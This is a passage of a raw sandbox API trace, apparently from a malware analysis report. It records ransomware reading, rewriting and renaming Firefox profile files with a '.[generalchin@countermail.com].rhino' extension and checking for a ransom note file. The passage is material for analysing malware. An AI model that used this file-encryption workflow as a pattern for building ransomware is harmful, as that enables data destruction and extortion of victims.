lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0096.960] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xef3 [0096.960] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1013, nNumberOfBytesToLockHigh=0x0) returned 1 [0096.960] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.960] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0096.963] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.964] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xef3, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xef3, lpOverlapped=0x0) returned 1 [0096.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0096.964] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0096.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0096.964] GetLastError () returned 0x0 [0096.964] SetLastError (dwErrCode=0x0) [0096.964] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xef3) returned 0x24b0048 [0096.964] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0096.964] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.965] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0096.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0048 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b02d8 [0096.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0420 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0096.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0608 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0420 | out: hHeap=0x6d0000) returned 1 [0096.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b08d8 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0608 | out: hHeap=0x6d0000) returned 1 [0096.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75ef78 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b08d8 | out: hHeap=0x6d0000) returned 1 [0096.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b02d8 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0096.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0096.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75fd90 [0096.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0096.967] WriteFile (in: hFile=0xec, lpBuffer=0x75fda0*, nNumberOfBytesToWrite=0x1013, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75fda0*, lpNumberOfBytesWritten=0x2cfa04*=0x1013, lpOverlapped=0x0) returned 1 [0096.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd90 | out: hHeap=0x6d0000) returned 1 [0096.968] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1013, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0096.968] CloseHandle (hObject=0xec) returned 1 [0096.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0096.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x23b02d8 [0096.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0096.969] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0096.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0096.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0096.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0096.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0096.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0096.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0096.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0096.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0097.017] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x0 [0097.017] CloseHandle (hObject=0x104) returned 1 [0097.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0097.018] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x10000 [0097.018] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10120, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.018] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.018] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0097.022] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.022] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x10000, lpOverlapped=0x0) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0097.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0097.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0097.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0097.024] GetLastError () returned 0x0 [0097.025] SetLastError (dwErrCode=0x0) [0097.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0097.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10023) returned 0x76c980 [0097.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0097.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0097.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0097.042] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0097.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0097.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0097.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0048 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b02d8 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0420 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0608 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0420 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b08d8 [0097.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0608 | out: hHeap=0x6d0000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0048 [0097.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b08d8 | out: hHeap=0x6d0000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b02d8 [0097.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b0048 [0097.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75ef78 [0097.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7604b8 [0097.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x762480 [0097.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7604b8 | out: hHeap=0x6d0000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x765418 [0097.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762480 | out: hHeap=0x6d0000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x73c0b8 [0097.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765418 | out: hHeap=0x6d0000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0097.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0097.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0097.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0097.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0097.072] WriteFile (in: hFile=0x104, lpBuffer=0x70a660*, nNumberOfBytesToWrite=0x10120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x70a660*, lpNumberOfBytesWritten=0x2cfa04*=0x10120, lpOverlapped=0x0) returned 1 [0097.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0097.076] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0097.076] CloseHandle (hObject=0x104) returned 1 [0097.078] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0097.078] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x24b02d8 [0097.078] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0097.078] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0097.079] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0097.079] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0097.079] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c980 | out: hHeap=0x6d0000) returned 1 [0097.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0097.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0097.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0097.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0097.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0097.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0097.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0097.082] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa00000 [0097.082] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa00120, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.082] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.082] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0097.084] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.084] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x200000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x200000, lpOverlapped=0x0) returned 1 [0097.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0097.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0097.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0097.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0097.397] GetLastError () returned 0x0 [0097.397] SetLastError (dwErrCode=0x0) [0097.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0097.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200023) returned 0x26b0020 [0097.872] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.872] WriteFile (in: hFile=0x104, lpBuffer=0x24b0150*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | 